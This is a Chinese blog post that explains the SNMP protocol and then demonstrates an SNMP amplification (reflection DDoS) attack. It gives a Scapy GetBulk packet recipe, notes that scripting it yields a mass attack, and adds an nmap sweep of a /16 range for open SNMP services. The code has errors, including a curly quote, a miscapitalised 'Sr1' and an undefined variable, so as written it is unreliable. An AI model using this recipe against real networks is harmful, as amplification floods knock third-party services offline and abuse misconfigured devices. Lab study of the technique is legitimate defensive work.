SNMP放大攻击原理及实战演示


年轻等于大象
年轻等于大象 2022-09-26 14:30:11 52134
分类专栏: 资讯

SNMP(Simple Network Management Protocol ):简单网络管理协议

SNMP主要工作原理:通过一台客户端机器向一个被管理的设备发出查询请求获取这台设备当前运行状态的检测等情况,网络监控一般是基于SNMP与Agent。
即:向管理的目标发送指令进行配置设置;网络监控:网络运行状态的监视

在SNMP的服务中,(被监控设备)端口UDP 161为主动查询请求;162端口为监控方在固定时间内受监控端向监控端自动发送查询请求。
同时管理信息数据库(MIB)是一个信息存储库,包含管理代理中的有关配置和性能的数据,按照不同分类(类似树形图),包含分属不同组的多个数据对象(库的设置还需要按照相应格式来进行书写)
 

应用模型:

SNMP是基于TCP/IP协议族的网络管理标准,是一种在IP网络中管理网络节点(如服务器、工作站、路由器、交换机等)的标准协议。SNMP能够使网络管理员提高网络管理效能,及时发现并解决网络问题以及规划网络的增长。网络管理员还可以通过SNMP接收网络节点的通知消息以及告警事件报告等来获知网络出现的问题。

SNMP管理的网络主要由三部分组成:

  • 被管理的设备
  • SNMP代理
  • 网络管理系统(NMS)

它们之间的关系如右图所示。

  • 网络中被管理的每一个设备都存在一个管理信息库(MIB)用于收集并储存管理信息。通过SNMP协议,NMS能获取这些信息。被管理设备,又称为网络单元或网络节点,可以是支持SNMP协议的路由器、交换机、服务器或者主机等等。
  • SNMP代理是被管理设备上的一个网络管理软件模块,拥有本地设备的相关管理信息,并用于将它们转换成与SNMP兼容的格式,传递给NMS。
  • NMS运行应用程序来实现监控被管理设备的功能。另外,NMS还为网络管理提供大量的处理程序及必须的储存资源。

 

下面介绍利用SNMP实现放大攻击实战:

工具:2003服务器(192.168.1.106)、kali。

首先配置2003服务器的SNMP服务

 

这里团体可以添加公有的与私有的,但是出于安全起见,并不希望添加这么一个团体,因为设置为公有的在公网上可以对其扫描到,然后成为别人放大攻击的帮凶,对于私有的,一旦别人探测并使用了SNMP服务,那么相当于取得了管理员权限可以执行可读可写能力是很恐怖的。

下面是2003和kali的IP地址 

在kali中进行包的配置,配置选项大概可以如此书写:

  1. i=IP()
  2. i.dst=“1.1.1.1"
  3. i.display()
  4. u=UDP()
  5. u.dport=161
  6. u.sport=161
  7. s=SNMP()
  8. s.community= 'public'
  9. s.display()
  10. b=SNMPbulk()
  11. b.display()
  12. b.max_repetitions = 100
  13. b.varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1')),SNMPvarbind(oid=ASN1_OID(' 1.3.6.1.2.1.19.1.3'))]
  14. s.PDU=b
  15. snmp.display()
  16. r= (i/u/s)
  17. r.display()
  18. Sr1(r)

打开wireshark可以观察返回数据包的大小,明明发送的是很小的流量请求,返回的确是很多倍的增长 

可以看到SNMP包的请求大小是95字节,当返回的确是1514*6+216的大小,无疑放大已经生效 

从下面的图中可以看出来,在流量中的数据包是可以看到些许明文的,如果在对信息进行解密处理,那么是能看到明文信息的,这也就彰显了服务器配置团体的作用。 

 

以上就是对于SNMP放大攻击的实战演示,当然这里仅仅是一个数据包,需要发起大量的攻击只需要将包的配置写成脚本即可。

如果网络上存在SNMP服务的服务端,利用namp是可以扫描出来的。

  1. 如:
  2. nmap -sU -p161 200.20.10.0/16
  3. 随便指定一个地址段。

网站声明:如果转载,请联系本站管理员。否则一切后果自行承担。

本文链接:https://www.xckfsq.com/news/show.html?id=10417
赞同 0
评论 0 条
年轻等于大象L0
粉丝 0 发表 5 + 关注 私信
上周热门
如何使用 StarRocks 管理和优化数据湖中的数据?  2935
【软件正版化】软件正版化工作要点  2854
统信UOS试玩黑神话:悟空  2811
信刻光盘安全隔离与信息交换系统  2702
镜舟科技与中启乘数科技达成战略合作,共筑数据服务新生态  1235
grub引导程序无法找到指定设备和分区  1205
点击报名 | 京东2025校招进校行程预告  162
华为全联接大会2024丨软通动力分论坛精彩议程抢先看!  160
2024海洋能源产业融合发展论坛暨博览会同期活动-海洋能源与数字化智能化论坛成功举办  156
华为纯血鸿蒙正式版9月底见!但Mate 70的内情还得接着挖...  154
本周热议
我的信创开放社区兼职赚钱历程 40
今天你签到了吗? 27
信创开放社区邀请他人注册的具体步骤如下 15
如何玩转信创开放社区—从小白进阶到专家 15
方德桌面操作系统 14
我有15积分有什么用? 13
用抖音玩法闯信创开放社区——用平台宣传企业产品服务 13
如何让你先人一步获得悬赏问题信息?(创作者必看) 12
2024中国信创产业发展大会暨中国信息科技创新与应用博览会 9
中央国家机关政府采购中心:应当将CPU、操作系统符合安全可靠测评要求纳入采购需求 8

加入交流群

请使用微信扫一扫!